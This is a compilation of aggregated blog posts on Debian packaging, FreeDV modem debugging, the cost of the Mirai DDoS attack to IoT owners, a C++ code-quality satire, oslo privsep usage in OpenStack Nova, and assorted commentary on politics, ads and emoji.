…and we’re done. This post has been pretty long so I am going to stop here for now. However, hopefully I’ve demonstrated that its actually not that hard to implement privsep in a project, even with some slight testing polish.

Share

The post Adding oslo privsep to a new project, a worked example appeared first on Made by Mikal.

,

Planet DebianRaphaël Hertzog: My Free Software Activities in April 2018

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

pkg-security team

I improved the packaging of openvas-scanner and openvas-manager so that they mostly work out of the box with a dedicated redis database pre-configured and with certificates created in the postinst. I merged a patch for cross-build support in mac-robber and another patch from chkrootkit to avoid unexpected noise in quiet mode.

I prepared an update of openscap-daemon to fix the RC bug #896766 and to update to a new upstream release. I pinged the package maintainer to look into the autopkgtest failure (that I did not introduce). I sponsored hashcat 4.1.0.

Distro Tracker

While it slowed down, I continued to get merge requests. I merged two of them for some newcomer bugs:

I reviewed a merge request suggesting to add a “team search” feature.

I did some work of my own too: I fixed many exceptions that have been seen in production with bad incoming emails and with unexpected maintainer emails. I also updated the contributor guide to match the new workflow with salsa and with the new pre-generated database and its associated helper script (to download it and configure the application accordingly). During this process I also filed a GitLab issue about the latest artifact download URL not working as advertised.

I filed many issues (#13 to #19) for things that were only stored in my personal TODO list.

Misc Debian work

Bug Reports. I filed bug #894732 on mk-build-deps to filter build dependencies to include/install based on build profiles. For reprepro, I always found the explanation about FilterList very confusing (bug #895045). I filed and fixed a bug on mirrorbrain with redirection to HTTPS URLs.

I also investigated #894979 and concluded that the CA certificates keystore file generated with OpenJDK 9 is not working properly with OpenJDK 8. This got fixed in ca-certificates-java.

Sponsorship. I sponsored pylint-plugin-utils 0.2.6-2.

Packaging. I uploaded oca-core (still in NEW) and ccextractor for Freexian customers. I also uploaded python-num2words (dependency for oca-core). I fixed the RC bug #891541 on lua-posix.

Live team. I reviewed better handling of missing host dependency on live-build and reviewed a live-boot merge request to ensure that the FQDN returned by DHCP was working properly in the initrd.

Thanks

See you next month for a new summary of my activities.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

Cory DoctorowDonald Trump is a pathogen evolved to thrive in an attention-maximization ecosystem


My latest Locus column is The Engagement-Maximization Presidency, and it proposes a theory to explain the political phenomenon of Donald Trump: we live in a world in which communications platforms amplify anything that gets “engagement” and provides feedback on just how much your message has been amplified so you can tune and re-tune for maximum amplification.


Peter Watts’s 2002 novel Maelstrom illustrates a beautiful, terrifying example of this, in which a mindless, self-modifying computer virus turns itself into a chatbot that impersonates patient zero in a world-destroying pandemic; even though the virus doesn’t understand what it’s doing or how it’s doing it, it’s able to use feedback to refine its strategies, gaining control over more resources with which to try more strategies.
P>
It’s a powerful metaphor for the kind of cold reading we see Trump engaging in at his rallies, and for the presidency itself. I think it also explains why getting Trump of Twitter is impossible: it’s his primary feedback tool, and without it, he wouldn’t know what kinds of rhetoric to double down on and what to quietly sideline.

Maelstrom is concerned with a pandemic that is started by its protago­nist, Lenie Clark, who returns from a deep ocean rift bearing an ancient, devastating pathogen that burns its way through the human race, felling people by the millions.

As Clark walks across the world on a mission of her own, her presence in a message or news story becomes a signal of the utmost urgency. The filters are firewalls that give priority to some packets and suppress others as potentially malicious are programmed to give highest priority to any news that might pertain to Lenie Clark, as the authorities try to stop her from bringing death wherever she goes.

Here’s where Watt’s evolutionary bi­ology shines: he posits a piece of self-modifying malicious software – something that really exists in the world today – that automatically generates variations on its tactics to find computers to run on and reproduce itself. The more computers it colonizes, the more strategies it can try and the more computational power it can devote to analyzing these experiments and directing its randomwalk through the space of all possible messages to find the strategies that penetrate more firewalls and give it more computational power to devote to its task.

Through the kind of blind evolution that produces predator-fooling false eyes on the tails of tropical fish, the virus begins to pretend that it is Lenie Clark, sending messages of increasing convincingness as it learns to impersonate patient zero. The better it gets at this, the more welcoming it finds the firewalls and the more computers it infects.

At the same time, the actual pathogen that Lenie Clark brought up from the deeps is finding more and more hospitable hosts to reproduce in: thanks to the computer virus, which is directing public health authorities to take countermeasures in all the wrong places. The more effective the computer virus is at neutralizing public health authorities, the more the biological virus spreads. The more the biological virus spreads, the more anxious the public health authorities become for news of its progress, and the more computers there are trying to suck in any intelligence that seems to emanate from Lenie Clark, supercharging the computer virus.

Together, this computer virus and biological virus co-evolve, symbiotes who cooperate without ever intending to, like the predator that kills the prey that feeds the scavenging pathogen that weakens other prey to make it easier for predators to catch them.


The Engagement-Maximization Presidency [Cory Doctorow/Locus]


(Image: Kevin Dooley, CC-BY; Trump’s Hair)

Krebs on SecurityStudy: Attack on KrebsOnSecurity Cost IoT Device Owners $323K

A monster distributed denial-of-service attack (DDoS) against KrebsOnSecurity.com in 2016 knocked this site offline for nearly four days. The attack was executed through a network of hacked “Internet of Things” (IoT) devices such as Internet routers, security cameras and digital video recorders. A new study that tries to measure the direct cost of that one attack for IoT device users whose machines were swept up in the assault found that it may have cost device owners a total of $323,973.75 in excess power and added bandwidth consumption.

My bad.

But really, none of it was my fault at all. It was mostly the fault of IoT makers for shipping cheap, poorly designed products (insecure by default), and the fault of customers who bought these IoT things and plugged them onto the Internet without changing the things’ factory settings (passwords at least.)

The botnet that hit my site in Sept. 2016 was powered by the first version of Mirai, a malware strain that wriggles into dozens of IoT devices left exposed to the Internet and running with factory-default settings and passwords. Systems infected with Mirai are forced to scan the Internet for other vulnerable IoT devices, but they’re just as often used to help launch punishing DDoS attacks.

By the time of the first Mirai attack on this site, the young masterminds behind Mirai had already enslaved more than 600,000 IoT devices for their DDoS armies. But according to an interview with one of the admitted and convicted co-authors of Mirai, the part of their botnet that pounded my site was a mere slice of firepower they’d sold for a few hundred bucks to a willing buyer. The attack army sold to this ne’er-do-well harnessed the power of just 24,000 Mirai-infected systems (mostly security cameras and DVRs, but some routers, too).

These 24,000 Mirai devices clobbered my site for several days with data blasts of up to 620 Gbps. The attack was so bad that my pro-bono DDoS protection provider at the time — Akamai — had to let me go because the data firehose pointed at my site was starting to cause real pain for their paying customers. Akamai later estimated that the cost of maintaining protection against my site in the face of that onslaught would have run into the millions of dollars.

We’re getting better at figuring out the financial costs of DDoS attacks to the victims (5, 6 or 7 -digit dollar losses) and to the perpetrators (zero to hundreds of dollars). According to a report released this year by DDoS mitigation giant NETSCOUT Arbor, fifty-six percent of organizations last year experienced a financial impact from DDoS attacks for between $10,000 and $100,000, almost double the proportion from 2016.

But what if there were also a way to work out the cost of these attacks to the users of the IoT devices which get snared by DDos botnets like Mirai? That’s what researchers at University of California, Berkeley School of Information sought to determine in their new paper, “rIoT: Quantifying Consumer Costs of Insecure Internet of Things Devices.

If we accept the UC Berkeley team’s assumptions about costs borne by hacked IoT device users (more on that in a bit), the total cost of added bandwidth and energy consumption from the botnet that hit my site came to $323,973.95. This may sound like a lot of money, but remember that broken down among 24,000 attacking drones the per-device cost comes to just $13.50.

So let’s review: The attacker who wanted to clobber my site paid a few hundred dollars to rent a tiny portion of a much bigger Mirai crime machine. That attack would likely have cost millions of dollars to mitigate. The consumers in possession of the IoT devices that did the attacking probably realized a few dollars in losses each, if that. Perhaps forever unmeasured are the many Web sites and Internet users whose connection speeds are often collateral damage in DDoS attacks.

Image: UC Berkeley.

Anyone noticing a slight asymmetry here in either costs or incentives? IoT security is what’s known as an “externality,” a term used to describe “positive or negative consequences to third parties that result from an economic transaction. When one party does not bear the full costs of its actions, it has inadequate incentives to avoid actions that incur those costs.”

In many cases negative externalities are synonymous with problems that the free market has a hard time rewarding individuals or companies for fixing or ameliorating, much like environmental pollution. The common theme with externalities is that the pain points to fix the problem are so diffuse and the costs borne by the problem so distributed across international borders that doing something meaningful about it often takes a global effort with many stakeholders — who can hopefully settle upon concrete steps for action and metrics to measure success.

The paper’s authors explain the misaligned incentives on two sides of the IoT security problem:

-“On the manufacturer side, many devices run lightweight Linux-based operating systems that open doors for hackers. Some consumer IoT devices implement minimal security. For example, device manufacturers may use default username and password credentials to access the device. Such design decisions simplify device setup and troubleshooting, but they also leave the device open to exploitation by hackers with access to the publicly-available or guessable credentials.”

-“Consumers who expect IoT devices to act like user-friendly ‘plug-and-play’ conveniences may have sufficient intuition to use the device but insufficient technical knowledge to protect or update it. Externalities may arise out of information asymmetries caused by hidden information or misaligned incentives. Hidden information occurs when consumers cannot discern product characteristics and, thus, are unable to purchase products that reflect their preferences. When consumers are unable to observe the security qualities of software, they instead purchase products based solely on price, and the overall quality of software in the market suffers.”

The UC Berkeley researchers concede that their experiments — in which they measured the power output and bandwidth consumption of various IoT devices they’d infected with a sandboxed version of Mirai — suggested that the scanning and DDoSsing activity prompted by a Mirai malware infection added almost negligible amounts in power consumption for the infected devices.

Thus, most of the loss figures cited for the 2016 attack rely heavily on estimates of how much the excess bandwidth created by a Mirai infection might cost users directly, and as such I suspect the $13.50 per machine estimates are on the high side.

No doubt, some Internet users get online via an Internet service provider that includes a daily “bandwidth cap,” such that over-use of the allotted daily bandwidth amount can incur overage fees and/or relegates the customer to a slower, throttled connection for some period after the daily allotted bandwidth overage.

But for a majority of high-speed Internet users, the added bandwidth use from a router or other IoT device on the network being infected with Mirai probably wouldn’t show up as an added line charge on their monthly bills. I asked the researchers about the considerable wiggle factor here:

“Regarding bandwidth consumption, the cost may not ever show up on a consumer’s bill, especially if the consumer has no bandwidth cap,” reads an email from the UC Berkeley researchers who wrote the report, including Kim Fong, Kurt Hepler, Rohit Raghavan and Peter Rowland.

“We debated a lot on how to best determine and present bandwidth costs, as it does vary widely among users and ISPs,” they continued. “Costs are more defined in cases where bots cause users to exceed their monthly cap. But even if a consumer doesn’t directly pay a few extra dollars at the end of the month, the infected device is consuming actual bandwidth that must be supplied/serviced by the ISP. And it’s not unreasonable to assume that ISPs will eventually pass their increased costs onto consumers as higher monthly fees, etc. It’s difficult to quantify the consumer-side costs of unauthorized use — which is likely why there’s not much existing work — and our stats are definitely an estimate, but we feel it’s helpful in starting the discussion on how to quantify these costs.”

Measuring bandwidth and energy consumption may turn out to be a useful and accepted tool to help more accurately measure the full costs of DDoS attacks. I’d love to see these tests run against a broader range of IoT devices in a much larger simulated environment.

If the Berkeley method is refined enough to become accepted as one of many ways to measure actual losses from a DDoS attack, the reporting of such figures could make these crimes more likely to be prosecuted.

Many DDoS attack investigations go nowhere because targets of these attacks fail to come forward or press charges, making it difficult for prosecutors to prove any real economic harm was done. Since many of these investigations die on the vine for a lack of financial damages reaching certain law enforcement thresholds to justify a federal prosecution (often $50,000 – $100,000), factoring in estimates of the cost to hacked machine owners involved in each attack could change that math.

But the biggest levers for throttling the DDoS problem are in the hands of the people running the world’s largest ISPs, hosting providers and bandwidth peering points on the Internet today. Some of those levers I detailed in the “Shaming the Spoofers” section of The Democraticization of Censorship, the first post I wrote after the attack and after Google had brought this site back online under its Project Shield program.

By the way, we should probably stop referring to IoT devices as “smart” when they start misbehaving within three minutes of being plugged into an Internet connection. That’s about how long your average cheapo, factory-default security camera plugged into the Internet has before getting successfully taken over by Mirai. In short, dumb IoT devices are those that don’t make it easy for owners to use them safely without being a nuisance or harm to themselves or others.

Maybe what we need to fight this onslaught of dumb devices are more network operators turning to ideas like IDIoT, a network policy enforcement architecture for consumer IoT devices that was first proposed in December 2017.  The goal of IDIoT is to restrict the network capabilities of IoT devices to only what is essential for regular device operation. For example, it might be okay for network cameras to upload a video file somewhere, but it’s definitely not okay for that camera to then go scanning the Web for other cameras to infect and enlist in DDoS attacks.

So what does all this mean to you? That depends on how many IoT things you and your family and friends are plugging into the Internet and your/their level of knowledge about how to secure and maintain these devices. Here’s a primer on minimizing the chances that your orbit of IoT things become a security liability for you or for the Internet at large.

Sociological ImagesPocket-sized Politics

Major policy issues like gun control often require massive social and institutional changes, but many of these issues also have underlying cultural assumptions that make the status quo seem normal. By following smaller changes in the way people think about issues, we can see gradual adjustments in our culture that ultimately make the big changes more plausible.

Photo Credit: Emojipedia

For example, today’s gun debate even drills down to the little cartoons on your phone. There’s a whole process for proposing and reviewing new emoji, but different platforms have their own control over how they design the cartoons in coordination with the formal standards. Last week, Twitter pointed me to a recent report from Emojipedia about platform updates to the contested “pistol” emoji, moving from a cartoon revolver to a water pistol:

In an update to the original post, all major vendors have committed to this design change for “cross-platform compatibility.”

There are a couple ways to look at this change from a sociological angle. You could tell a story about change from the bottom-up, through social movements like the March For Our Lives, calling for gun reform in the wake of mass shootings. These movements are drawing attention to the way guns permeate American culture, and their public visibility makes smaller choices about the representation of guns more contentious. Apple didn’t comment directly on the intentions behind the redesign when it came out, but it has weighed in on the politics of emoji design in the past.

You could also tell a story about change from the top-down, where large tech companies have looked to copy Apple’s innovation for consistency in a contentious and uncertain political climate (sociologists call this “institutional isomorphism”). In the diagram, you can see how Apple’s early redesign provided an alternative framework for other companies to take up later on, just like Google and Microsoft adopted the dominant pistol design in earlier years.

Either way, if you favor common sense gun reform, redesigning emojis is obviously not enough. But cases like this help us understand how larger shifts in social norms are made up of many smaller changes that challenge the status quo.

Evan Stewart is a Ph.D. candidate in sociology at the University of Minnesota. You can follow him on Twitter.

(View original at https://thesocietypages.org/socimages)

Worse Than FailureCodeSOD: CHashMap

There’s a phenomenon I think of as the “evolution of objects” and it impacts novice programmers. They start by having piles of variables named things like userName0, userName1, accountNum0, accountNum1, etc. This is awkward and cumbersome, and then they discover arrays. string* userNames, int[] accountNums. This is also awkward and cumbersome, and then they discover hash maps, and can do something like Map<string, string>* users. Most programmers go on to discover “wait, objects do that!”

Not so Brian’s co-worker, Dagny. Dagny wanted to write some C++, but didn’t want to learn that pesky STL or have to master templates. Dagny also considered themselves a “performance junkie”, so they didn’t want to bloat their codebase with peer-reviewed and optimized code, and instead decided to invent that wheel themselves.

Thus was born CHashMap. Now, Brian didn’t do us the favor of including any of the implementation of CHashMap, claiming he doesn’t want to “subject the readers to the nightmares that would inevitably arise from viewing this horror directly”. Important note for submitters: we want those nightmares.

Instead, Brian shares with us how the CHashMap is used, and from that we can infer a great deal about how it was implemented. First, let’s simply look at some declarations:

    CHashMap bills;
    CHashMap billcols;
    CHashMap summary;
    CHashMap billinfo;

Note that CHashMap does not take any type parameters. This is because it’s “type ignorant”, which is like being type agnostic, but with more char*. For example, if you want to get, say, the “amount_due” field, you might write code like this:

    double amount = 0;
    amount = Atof(bills.Item("amount_due"));

Yes, everything, keys and values, is simply a char*. And, as a bonus, in the interests of code clarity, we can see that Dagny didn’t do anything dangerous, like overload the [] operator. It would certainly be confusing to be able to index the hash map like it were any other collection type.

Now, since everything is stored as a char*, it’s onto you to convert it back to the right type, but since chars are just bytes if you don’t look too closely… you can store anything at that pointer. So, for example, if you wanted to get all of a user’s billing history, you might do something like this…

    CHashMap bills;
    CHashMap billcols;
    CHashMap summary;
    CHashMap billinfo;

    int nbills = dbQuery (query, bills, billcols);
    if (nbills > 0) {
        // scan the bills for amounts and/or issues
        double amount;
        double amountDue = 0;
        int unresolved = 0;

        for (int r=0; r<nbills; r++) {
            if (Strcmp(bills.Item("payment_status",r),BILL_STATUS_REMITTED) != 0) {
                billinfo.Clear();
                amount = Atof(bills.Item("amount_due",r));
                if (amount >= 0) {
                    amountDue += amount;
                    if (Strcmp(bills.Item("status",r),BILL_STATUS_WAITING) == 0) {
                        unresolved += 1;
                        billinfo.AddItem ("duedate", FormatTime("YYYY-MM-DD hh:mm:ss",cvtUTC(bills.Item("due_date",r))));
                        billinfo.AddItem ("biller", bills.Item("account_display_name",r));
                        billinfo.AddItem ("account", bills.Item("account_number",r));
                        billinfo.AddItem ("amount", amount);
                    }
                }
                else {
                    amountDue += 0;
                    unresolved += 1;
                    billinfo.AddItem ("duedate", FormatTime("YYYY-MM-DD hh:mm:ss",cvtUTC(bills.Item("due_date",r))));
                    billinfo.AddItem ("biller", bills.Item("account_display_name",r));
                    billinfo.AddItem ("account", bills.Item("account_number",r));
                    billinfo.AddItem ("amount", "???");
                }
                summary.AddItem ("", &billinfo);
            }
        }
    }

Look at that summary.AddItem ("", &billinfo) line. Yes, that is an empty key. Yes, they’re pointing it at a reference to the billinfo (which also gets Clear()ed a few lines earlier, so I have no idea what’s happening there). And yes, they’re doing this assignment in a loop, but don’t worry! CHashMap allows multiple values per key! That "" key will hold everything.

So, you have multi-value keys which can themselves point to nested CHashMaps, which means you don’t need any complicated JSON or XML classes, you can just use CHashMap as your hammer/foot-gun.

    //code which fetches account details from JSON
    CHashMap accounts;
    CHashMap details;
    CHashMap keys;

    rc = getAccounts (userToken, accounts);
    if (rc == 0) {
        for (int a=1; a<=accounts.Count(); a++) {
            cvt.jsonToKeys (accounts.Item(a), keys);
            rc = getAccountDetails (userToken, keys.Item("accountId"), details);
        }
    }
    // Details of getAccounts
    int getAccounts (const char * user, CHashMap& rows) {
      // <snip>
      AccountClass account;
      for (int a=1; a<=count; a++) {
        // Populate the account class
        // <snip>
        rows.AddItem ("", account.jsonify(t));
      }

With this kind of versatility, is it any surprise that pretty much every function in the application depends on a CHashMap somehow? If that doesn’t prove its utility, I don’t know what will. How could you do anything better? Use classes? Don’t make me laugh!

As a bonus, remember this line above? billinfo.AddItem ("duedate", FormatTime("YYYY-MM-DD hh:mm:ss",cvtUTC(bills.Item("due_date",r))))? Well, Brian has this to add:

it’s worth mentioning that our DB stores dates in the typical format: “YYYY-MM-DD hh:mm:ss”. cvtUTC is a function that converts a date-time string to a time_t value, and FormatTime converts a time_t to a date-time string.

[Advertisement] ProGet can centralize your organization's software applications and components to provide uniform access to developers and servers. Check it out!

,

Planet Linux AustraliaDavid Rowe: FreeDV 700D and SSB Comparison

Mark, VK5QI has just performed a SSB versus FreeDV 700D comparison between his home in Adelaide and the Manly Warringah Radio Society WebSDR SDR in Sydney, about 1200km away. The band was 40m, and the channel very poor, with some slow fading. Mark used SVN revision 3581, built himself on Ubuntu, with an interleaver setting (Tools-Options menu) of 1 frame. Transmit power for SSB and FreeDV 700D was about the same.

I’m still finishing off FreeDV 700D integration and tuning the mode – but this is a very encouraging start. Thanks Mark!

Don MartiUnlocking the hidden European mode in web ads

It would make me really happy to be able to yellow-list Google web ads in Privacy Badger. (Yellow-listed domains are not blocked, but have their cookies restricted in order to cut back on cross-site tracking.) That's because a lot of news and cultural sites use DoubleClick for Publishers and other Google services to deliver legit, context-based advertising. Unfortunately, as far as I can tell, Google mixes in-context ads with crappy, spam-like, targeted stuff. What I want is something like Doc Searls style ads: Just give me ads not based on tracking me.

Until now, there has been no such setting. There could have been, if Do Not Track (DNT) had turned out to be a thing, but no. But there is some good news. Instead of one easy-to-use DNT, sites are starting to give us harder-to-find, but still usable, settings, in order to enable GDPR-compliant ads for Europe. Here's Google's: Ads personalization settings in Google’s publisher ad tags - DoubleClick for Publishers Help.

Wait a minute? Google respects DNT now?

Sort of. GDPR-compliant terms written by Google aren't exactly the same as EFF's privacy-friendly Do Not Track (DNT) Policy All these different tracking policies are reminding me of open source licenses for some reason. but close enough. The catch is that as an end user, you can't just turn on Google's European mode. You have to do some JavaScript. I think I figured out how to do this in a simple browser extension to unlock secret European status.

Google doesn't appear to have their European mode activated yet, so I added a do-nothing "European mode" to the Aloodo project, for testing. I'm not able to yellow-list Google yet, but when GDPR takes effect later this month I'll test it some more.

In the meantime, I'll keep looking for other examples of hidden European mode, and see if I can figure out how to activate them.

,

Rondam RamblingsIn your face, liberal haters!

The New York Times reports that California is now world's 5th largest economy.  Only the U.S. as a whole, China, Japan and Germany are bigger.  On top of that the vast majority of that growth came from the coastal areas, where the liberals live. Meanwhile, in Kansas, the Republican experiment in stimulating economic growth by cutting taxes has gone down in screaming flames: The experiment with

,

CryptogramFriday Squid Blogging: US Army Developing 3D-Printable Battlefield Robot Squid

The next major war will be super weird.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Planet Linux AustraliaDavid Rowe: FreeDV 1600 Sample Clock Offset Bug

So I’m busy integrating FreeDV 700D into the FreeDV GUI program. The 700D modem works on larger frames (160ms) than the previous modes (e.g. 20ms for FreeDV 1600) so I need to adjust FIFO sizes.

As a reference I tried FreeDV 1600 between two laptops (one tx, one rx) and noticed it was occasionally losing frame sync, generating bit errors, and producing the occasional bloop in the audio. After a little head scratching I discovered a bug in the FreeDV 1600 FDMDV modem! Boy, is my face red.

The FMDMV modem was struggling with sample clock differences between the mod and demod. I think the bug was introduced when I did some (too) clever refactoring to reduce FDMDV memory consumption while developing the SM1000 back in 2014!

Fortunately I have a trail of unit test programs, leading back from FreeDV GUI, to the FreeDV API (freedv_tx and freedv_rx), then individual unit tests for each modem (fdmdv_mod/fdmdv_demod), and finally Octave simulation code (fdmdv.m, fdmdv_demod.m and friends) for the modem.

Octave (or an equivalent vector based scripting language like Python/numpy) is much easier to work with than C for complex DSP problems. So after a little work I reproduced the problem using the Octave version of the FDMDV modem – bit errors happening every time there was a timing jump.

The modulator sends parallel streams of symbols at about 50 baud. These symbols are output at a sample rate of 8000 Hz. Part of the demodulators job is to estimate the best place to sample each received modem symbol, this is called timing estimation. When the tx and rx are separate, the two sample clocks are slightly different – your 8000 Hz clock will be a few Hz different to mine. This means the timing estimate is a moving target, and occasionally we need to compenstate by talking a few more or few less samples from the 8000 Hz sample stream.

In the plot below the Octave demodulator was fed with a signal that is transmitted at 8010 Hz instead of the nominal 8000 Hz. So the tx is sampling faster than the rx. The y axis is the timing estimate in samples, x axis time in seconds. For FreeDV 1600 there are 160 samples per symbol (50 baud at 8 kHz). The timing estimate at the rx drifts forwards until we hit a threshold, set at +/- 40 samples (quarter of a symbol). To avoid the timing estimate drifting too far, we take a one-off larger block of samples from the input, the timing takes a step backwards, then starts drifting up again.

Back to the bug. After some head scratching, messing with buffer shifts, and rolling back phases I eventually fixed the problem in the Octave code. Next step is to port the code to C. I used my test framework that automatically compares a bunch of vectors (states) in the Octave code to the equivalent C code:

octave:8> system("../build_linux/unittest/tfdmdv")
sizeof FDMDV states: 40032 bytes
ans = 0
octave:9> tfdmdv
tx_bits..................: OK
tx_symbols...............: OK
tx_fdm...................: OK
pilot_lut................: OK
pilot_coeff..............: OK
pilot lpf1...............: OK
pilot lpf2...............: OK
S1.......................: OK
S2.......................: OK
foff_coarse..............: OK
foff_fine................: OK
foff.....................: OK
rxdec filter.............: OK
rx filt..................: OK
env......................: OK
rx_timing................: OK
rx_symbols...............: OK
rx bits..................: OK
sync bit.................: OK
sync.....................: OK
nin......................: OK
sig_est..................: OK
noise_est................: OK

passes: 46 fails: 0

Great! This system really lets me move fast once the Octave code is written and tested. Next step is to test the C version of the FDMDV modem using the command line arguments. Note how I used sox to insert a sample rate offset by changing the same rate of the raw sample stream:

build_linux/src$ ./fdmdv_get_test_bits - 30000 | ./fdmdv_mod - - | sox -t raw -r 8000 -s -2 - -t raw -r 7990 - | ./fdmdv_demod - - 14 demod_dump.txt | ./fdmdv_put_test_bits -
-----------------+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
bits 29568  errors 0  BER 0.0000

Zero errors, despite 10Hz sample clock offset. Yayyyyy. The C demodulator outputs a bunch of vectors that can be plotted with an Octave helper program:

octave:6> fdmdv_demod_c("../build_linux/src/demod_dump.txt",28000)

The FDMDV modem is integrated with Codec 2 in the FreeDV API. This can be tested using the freedv_tx/freedv_rx programs. For convenience, I generated some 60 second test files at different sample rates. Here is how I test using the freedv_rx program:

./freedv_rx 1600 ~/Desktop/ve9qrp_1600_8010.raw - | aplay -f S16

The ouput audio sounds good, no bloops, and by examining the freedv_rx_log.txt file I can see the demodulator didn’t loose sync. Cool.

Here is a table of the samples I used for testing:

No clock offset Simulates Tx sample rate 10Hz slower than Rx Simulates Tx sampling 10Hz faster than Rx

Finally, the FreeDV API is linked with the FreeDV GUI program. Here is a video of me testing different sample clock offsets using the raw files in the table above. Note there is no audio in this video as my screen recorder fights with FreeDV for use of sound cards. However the decoded FreeDV audio should be uninterrupted, there should be no re-syncs, and zero bit errors:

The fix has been checked into codec2-dev SVN rev 3556, and will make it’s way into FreeDV GUI 1.3, to be released in late May 2018.

Reading Further

FDMDV modem
README_fdmdv.txt
Steve Ports an OFDM modem from Octave to C, some more on the Octave/C automated test framework and porting complex DSP algorithms.
Testing a FDMDV Modem. Early blog post on FDMDV modem with some more disucssion on sample clock offsets
Timing Estimation for PSK modems, talks a little about how we generate a timing estimate

CryptogramDetecting Laptop Tampering

Micah Lee ran a two-year experiment designed to detect whether or not his laptop was ever tampered with. The results are inconclusive, but demonstrate how difficult it can be to detect laptop tampering.

Worse Than FailureError'd: Version-itis

"No thanks, I'm holding out for version greater than or equal to 3.6 before upgrading," writes Geoff G.

 

"Looks like Twilio sent me John Doe's receipt by mistake," wrote Charles L.

 

"Little do they know that I went back in time and submitted my resume via punch card!" Jim M. writes.

 

Richard S. wrote, "I went to request a password reset from an old site that is sending me birthday emails, but it looks like the reCAPTCHA is no longer available and the site maintainers have yet to notice."

 

"It's nice to see that this new Ultra Speed Plus™ CD burner lives up to its name, but honestly, I'm a bit scared to try some of these," April K. writes.

 

"Sometimes, like Samsung's website, you have to accept that it's just ok to fail sometimes," writes Alessandro L.

 

[Advertisement] ProGet supports your applications, Docker containers, and third-party packages, allowing you to enforce quality standards across all components. Download and see how!

Planet Linux AustraliaSimon Lyall: Audiobooks – April 2018

Viking Britain: An Exploration by Thomas Williams

Pretty straightforward, Tells as the uptodate research (no Winged Helmets 😢) and easy to follow (easier if you have a map of the UK) 7/10

Contact by Carl Sagan

I’d forgotten how different it was from the movie in places. A few extra characters and plot twists. many more details and explanations of the science. 8/10

The Path Between the Seas: The Creation of the Panama Canal, 1870-1914 by David McCullough

My monthly McCullough book. Great as usual. Good picture of the project and people. 8/10

Winter World: The Ingenuity of Animal Survival by Bernd Heinrich

As per the title this spends much of the time on [varied strategies for] Winter adaptation vs Summer World’s more general coverage. A great listen 8/10

A Man on the Moon: The Voyages of the Apollo Astronauts by Andrew Chaikin

Great overview of the Apollo missions. The Author interviewed almost all the astronauts. Lots of details about the missions. Excellent 9/10

Walkaway by Cory Doctorow

Near future Sci Fi. Similar feel to some of his other books like Makers. Switches between characters & audiobook switches narrators to match. Fastforward the Sex Scenes 💤. Mostly works 7/10

The Neanderthals Rediscovered: How Modern Science Is Rewriting Their Story by Michael A. Morse

Pretty much what the subtitle advertises. Covers discoveries from the last 20 years which make other books out of date. Tries to be Neanderthals-only. 7/10

The Great Quake: How the Biggest Earthquake in North America Changed Our Understanding of the Planet by Henry Fountain

Straightforward story of the 1964 Alaska Earthquake. Follows half a dozen characters & concentrates on worst damaged areas. 7/10

Share

Rondam RamblingsI don't know where I'm a gonna go when the volcano blows

Hawaii's Kilauea volcano is erupting.  So is one in Vanuatu.  And there is increased activity in Yellowstone.  Hang on to your hats, folks, Jesus's return must be imminent. (In case you didn't know, the title is a line from a Jimmy Buffet song.)

,

Planet Linux AustraliaMichael Still: How to make a privileged call with oslo privsep

Share

Once you’ve added oslo privsep to your project, how do you make a privileged call? Its actually really easy to do. In this post I will assume you already have privsep running for your project, which at the time of writing limits you to OpenStack Nova in the OpenStack universe.

The first step is to write the code that will run with escalated permissions. In Nova, we have chosen to only have one set of escalated permissions, so its easy to decide which set to use. I’ll document how we reached that decision and alternative approaches in another post.

In Nova, all code that runs with escalated permissions is in the nova/privsep directory, which is a pattern I’d like to see repeated in other projects. This is partially because privsep maintains a whitelist of methods that are allowed to be run this way, but its also because it makes it very obvious to callers that the code being called is special in some way.

Let’s assume that we’re going to add a simple method which manipulates the filesystem of a hypervisor node as root. We’d write a method like this in a file inside nova/privsep:

import nova.privsep

...

@nova.privsep.sys_admin_pctxt.entrypoint
def update_motd(message):
    with open('/etc/motd', 'w') as f:
        f.write(message)

This method updates /etc/motd, which is the text which is displayed when a user interactively logs into the hypervisor node. “motd” stands for “message of the day” by the way. Here we just pass a new message of the day which clobbers the old value in the file.

The important thing is that entrypoint decorator at the start of the method. That’s how privsep decides to run this method with escalated permissions, and decides what permissions to use. In Nova at the moment we only have one set of escalated permissions, which we called sys_admin_pctxt because we’re artists. I’ll discuss in a later post how we came to that decision and what the other options were.

We can then call this method from anywhere else in Nova like this:

import nova.privsep.motd

...

nova.privsep.motd('This node is currently idle')

Note that we do imports for privsep code slightly differently. We always import the entire path, instead of creating a shortcut to just the module we’re using. In other words, we don’t do:

from nova.privsep import motd

...

motd('This node is a banana')

The above code would work, but is frowned on because it is less obvious here that the update_motd() method runs with escalated permissions — you’d have to go and read the imports to tell that.

That’s really all there is to it. The only other thing to mention is that there is a bit of a wart — code with escalated permissions can only use Nova code that is within the privsep directory. That’s been a problem when we’ve wanted to use a utility method from outside that path inside escalated code. The restriction happens for good reasons, so instead what we do in this case is move the utility into the privsep directory and fix up all the other callers to call the new location. Its not perfect, but its what we have for now.

There are some simple review criteria that should be used to assess a patch which implements new code that uses privsep in OpenStack Nova. They are:

  • Don’t use imports which create aliases. Use the “import nova.privsep.motd” form instead.
